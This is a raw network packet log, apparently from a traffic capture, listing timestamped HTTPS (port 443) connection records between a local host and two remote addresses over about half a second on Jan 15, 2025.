                                                                                                                                            Jan 15, 2025 19:14:37.902323008 CET49828443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:37.902335882 CET44349828104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:37.902885914 CET44349828104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:37.902959108 CET49828443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:37.902971983 CET44349828104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:37.903074980 CET44349828104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:37.903182030 CET44349828104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:37.903245926 CET49828443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:37.903259993 CET44349828104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:37.903337002 CET49828443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:37.903348923 CET44349828104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:37.912447929 CET49833443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:37.915330887 CET44349832104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:37.916040897 CET44349831104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:37.916090012 CET44349831104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:37.916141033 CET44349831104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:37.916214943 CET49831443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:37.916766882 CET49831443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:37.916805983 CET44349831104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:37.917152882 CET49842443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:37.917171001 CET44349842104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:37.917193890 CET44349834104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:37.917223930 CET49842443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:37.917402029 CET49834443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:37.917418957 CET44349834104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:37.918248892 CET49842443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:37.918256998 CET44349842104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:37.918458939 CET44349834104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:37.918531895 CET49834443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:37.918812990 CET49834443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:37.918889046 CET44349834104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:37.919234037 CET49834443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:37.919245958 CET44349834104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:37.928309917 CET49832443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:37.941807985 CET44349829104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:37.942006111 CET44349829104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:37.942174911 CET44349829104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:37.942229986 CET49829443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:37.942393064 CET49829443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:37.942401886 CET44349829104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:37.942750931 CET49843443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:37.942804098 CET44349843104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:37.942872047 CET49843443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:37.943255901 CET49843443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:37.943284988 CET44349843104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:37.944333076 CET49828443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:37.944348097 CET44349828104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:37.953460932 CET44349828104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:37.953551054 CET49828443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:37.953567028 CET44349828104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:37.959408998 CET49834443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:37.998976946 CET44349828104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:37.999058008 CET49828443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:37.999073982 CET44349828104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:37.999202013 CET44349828104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:37.999254942 CET49828443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:37.999268055 CET44349828104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:37.999413013 CET44349828104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:37.999466896 CET49828443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:37.999480009 CET44349828104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:37.999628067 CET44349828104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:37.999650002 CET44349828104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:37.999691963 CET49828443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:37.999712944 CET44349828104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:37.999737024 CET49828443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:37.999759912 CET44349828104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:37.999820948 CET49828443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:37.999852896 CET44349828104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.000042915 CET49828443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:38.000056028 CET44349828104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.000091076 CET44349828104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.000144958 CET49828443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:38.000159025 CET44349828104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.000246048 CET44349828104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.000323057 CET49828443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:38.000335932 CET44349828104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.000358105 CET44349828104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.000416040 CET49828443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:38.000430107 CET44349828104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.000482082 CET49828443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:38.001108885 CET44349828104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.001188993 CET49828443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:38.001223087 CET44349828104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.001297951 CET49828443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:38.002068043 CET44349828104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.002137899 CET49828443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:38.002186060 CET44349828104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.002262115 CET49828443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:38.002293110 CET44349828104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.002350092 CET49828443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:38.040332079 CET44349828104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.040623903 CET49828443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:38.046276093 CET44349832104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.046560049 CET44349832104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.046633959 CET49832443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:38.046969891 CET49832443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:38.046992064 CET44349832104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.047283888 CET49844443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:38.047375917 CET44349844104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.047487020 CET49844443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:38.047703028 CET49844443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:38.047735929 CET44349844104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.049748898 CET44349833104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.049799919 CET44349833104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.049841881 CET44349833104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.049875975 CET44349833104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.049915075 CET44349833104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.049945116 CET44349833104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.049981117 CET44349833104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.049998045 CET49833443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:38.049998999 CET49833443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:38.050071001 CET44349833104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.050120115 CET49833443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:38.050146103 CET49833443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:38.050410032 CET44349833104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.050554991 CET44349833104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.050617933 CET49833443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:38.050713062 CET49833443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:38.050748110 CET44349833104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.050772905 CET49833443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:38.050817013 CET49833443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:38.051042080 CET49845443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:38.051135063 CET44349845104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.051222086 CET49845443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:38.051474094 CET49845443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:38.051513910 CET44349845104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.086196899 CET44349828104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.086271048 CET49828443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:38.086328030 CET44349828104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.086389065 CET49828443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:38.086448908 CET44349828104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.086522102 CET49828443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:38.086568117 CET44349828104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.086630106 CET49828443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:38.086688995 CET44349828104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.086750031 CET49828443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:38.086805105 CET44349828104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.086858988 CET49828443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:38.086967945 CET44349828104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.087024927 CET49828443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:38.087085962 CET44349828104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.087155104 CET49828443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:38.087196112 CET44349828104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.087253094 CET49828443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:38.087646008 CET44349828104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.087708950 CET49828443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:38.087771893 CET44349828104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.087829113 CET49828443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:38.087898970 CET44349828104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.087960005 CET49828443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:38.088068962 CET44349828104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.088128090 CET49828443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:38.088172913 CET44349828104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.088224888 CET49828443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:38.088566065 CET44349828104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.088630915 CET49828443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:38.088677883 CET44349828104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.088746071 CET49828443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:38.088795900 CET44349828104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.088856936 CET49828443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:38.088870049 CET44349828104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.088964939 CET44349828104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.089020014 CET49828443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:38.089320898 CET49828443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:38.089335918 CET44349828104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.089634895 CET49846443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:38.089680910 CET44349846104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.089742899 CET49846443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:38.090270042 CET49846443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:38.090287924 CET44349846104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.102327108 CET49678443192.168.2.1620.189.173.10
                                                                                                                                            Jan 15, 2025 19:14:38.102824926 CET44349836104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.103101969 CET49836443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:38.103149891 CET44349836104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.103637934 CET44349836104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.104120016 CET49836443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:38.104223967 CET44349836104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.104234934 CET49836443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:38.109605074 CET44349834104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.109700918 CET44349834104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.109914064 CET49834443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:38.110265970 CET49834443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:38.110287905 CET44349834104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.110586882 CET49847443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:38.110655069 CET44349847104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.110730886 CET49847443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:38.111000061 CET49847443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:38.111040115 CET44349847104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.150335073 CET49836443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:38.150366068 CET44349836104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.176321983 CET44349837104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.176603079 CET49837443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:38.176630020 CET44349837104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.177087069 CET44349837104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.177527905 CET49837443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:38.177604914 CET44349837104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.177704096 CET49837443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:38.223331928 CET44349837104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.233503103 CET44349838104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.233900070 CET49838443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:38.233916044 CET44349838104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.234559059 CET44349838104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.234920025 CET49838443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:38.235008955 CET44349838104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.235074043 CET49838443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:38.269397974 CET44349836104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.269479036 CET44349836104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.269531012 CET44349836104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.269578934 CET44349836104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.269587994 CET49836443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:38.269627094 CET44349836104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.269644976 CET49836443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:38.269670963 CET44349836104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.269705057 CET44349836104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.269740105 CET44349836104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.269763947 CET49836443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:38.269777060 CET44349836104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.269788980 CET49836443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:38.270438910 CET44349836104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.270478964 CET49836443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:38.270494938 CET44349836104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.274113894 CET44349836104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.274173975 CET49836443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:38.274204969 CET44349836104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.275335073 CET44349838104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.278361082 CET49838443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:38.312498093 CET44349840104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.312768936 CET49840443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:38.312788963 CET44349840104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.313859940 CET44349840104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.314222097 CET49840443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:38.314372063 CET49840443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:38.314377069 CET44349840104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.314394951 CET44349840104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.318113089 CET44349839104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.318455935 CET49839443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:38.318494081 CET44349839104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.319714069 CET44349839104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.320306063 CET49839443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:38.320534945 CET44349839104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.320540905 CET49839443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:38.325325966 CET49836443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:38.328485012 CET44349841104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.328711987 CET49841443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:38.328747034 CET44349841104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.329832077 CET44349841104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.329906940 CET49841443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:38.330245972 CET49841443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:38.330322027 CET44349841104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.330487013 CET49841443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:38.330501080 CET44349841104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.331631899 CET44349837104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.331892014 CET44349837104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.332073927 CET49837443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:38.332472086 CET49837443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:38.332514048 CET44349837104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.332856894 CET49848443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:38.332911015 CET44349848104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.332984924 CET49848443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:38.333318949 CET49848443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:38.333338976 CET44349848104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.355961084 CET44349836104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.356060982 CET44349836104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.356271029 CET49836443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:38.356308937 CET44349836104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.356326103 CET49836443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:38.356326103 CET49836443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:38.356659889 CET49836443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:38.356672049 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:38.356702089 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.356919050 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:38.357217073 CET49849443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:38.357234001 CET44349849104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.357358932 CET49840443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:38.363341093 CET44349839104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.373333931 CET49841443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:38.373336077 CET49839443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:38.373740911 CET44349842104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.373971939 CET49842443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:38.373985052 CET44349842104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.374990940 CET44349842104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.375065088 CET49842443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:38.375397921 CET49842443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:38.375456095 CET44349842104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.375530005 CET49842443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:38.384908915 CET44349838104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.385014057 CET44349838104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.385202885 CET44349838104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.385247946 CET49838443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:38.385247946 CET49838443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:38.385777950 CET49838443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:38.385792971 CET44349838104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.386035919 CET49850443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:38.386126041 CET44349850104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.386203051 CET49850443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:38.386578083 CET49850443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:38.386615038 CET44349850104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.407391071 CET44349843104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.407711029 CET49843443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:38.407789946 CET44349843104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.408425093 CET44349843104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.409213066 CET49843443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:38.409322023 CET44349843104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:38.409343004 CET49843443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:38.420331955 CET49842443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:38.420350075 CET44349842104.18.69.40192.168.2.16
